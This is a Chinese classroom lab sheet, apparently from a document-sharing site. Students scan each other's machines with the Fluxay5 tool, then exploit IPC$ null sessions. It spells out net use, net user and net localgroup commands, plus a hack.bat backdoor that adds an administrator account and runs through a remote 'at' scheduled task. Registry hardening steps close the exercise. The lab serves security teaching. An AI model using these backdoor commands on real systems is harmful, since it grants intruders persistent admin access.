《使用流光Fluxay5综合扫描工具并分析结果.docx》由会员分享,可在线阅读,更多相关《使用流光Fluxay5综合扫描工具并分析结果.docx(4页珍藏版)》请在三一办公上搜索。
1、使用流光Fluxay5综合扫描工具并分析结果任务二:使用流光Fluxay5综合扫描工具并分析结果 各部份功能: 1: 暴力破解的设置区域 2:控制台输出 3:扫描出来的典型漏洞列表 4:扫描或者暴力破解成功的用户帐号 5:扫描和暴力破解的速度控制 6:扫描和暴力破解时的状态显示 7:中止按钮 8:探测记录查找 选择“文件”“高级扫描向导”可打开高级扫描向导,设置扫描参数。 扫描结束后,流光会自动打开HTML格式的扫描报告,而且还把可利用的主机列在流光界面的最下方,如图1所示。 图1 单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。 图2 除了使用“高级扫描向导”配置高级扫描外
2、,还可以在探测菜单中直接选取高级扫描工具设置: 分组角色:学生A、学生B互相扫描对方主机。 实验步骤: 开放FTP服务,允许匿名连接。 打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。 仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。 根据扫描结果分析FTP漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文件。 根据扫描结果分析IPC$漏洞: IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IP
3、C$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。 IPC$相关命令: 1.建立和目标的ipc$连接命令:net use 目标IPipc$ “密码”/user:“ADMIN”,如:net use 192.168.27.128ipc$“” /user:administrator 2.映射网络驱动器命令:net use 本地盘符目标IP盘符$,如:net use z:192.168.27.128c$ 3.和目标建立了ipc$后,则可直接用IP加盘符加$访问。比如:copy 文件名IP盘符$路径文件名,如: copy hack.bat1
4、92.168.27.128c$ 也可直接对映射为本地磁盘的网络驱动器操作。 4.管理计算机上面的账号命令:net user .查看账号命令:net user .建立账号命令:net user name passwd/add .删除账号命令:net user name /delete 5.管理工作组命令:net localgroup组名用户名/adddelete .如:net localgroupadministrators sysback/add。该命令表示把sysback用户添加到管理员组。 6.查看目标计算机的系统时间:net time ip 7.在远程主机上建立计划任务:at IP TI
5、ME COMMAND .at 192.168.27.128 13:45 c:hack.bat 8.删除和目标的ipc$连接命令:net use IPipc$ /del 9.断开所有IPC$连接:net use * /del 10.禁止建立空连接:运行regedit,找到主键HKEY_LOCAL_MACHINE SYSTEM CurrentControlSetControl LSA ,把RestrictAnonymous的键值改为:00000001。 11.禁止自动打开默认共享:找到主键 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanma
6、nServerParameters,把AutoShareServer的键值改为:00000000, 如果不存在,就新建一个再改键值。 利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤: 1.编写批处理文件hack.bat,文件中包含两个命令: 1)建立一个新账号, 2)将新账号加入administrators组。 2.使用net命令与目标主机建立连接 3.将批处理文件hack.back拷贝至目标主机上。 4.通过计划任务使目标主机执行hack.bat文件。 5.断开所有IPC$连接。 6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。 7.删除和目标主机的连接。 执行安全防护措施: 1.目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享 2.重新使用net命令与目标主机建立连接,观察结果是否有变化。
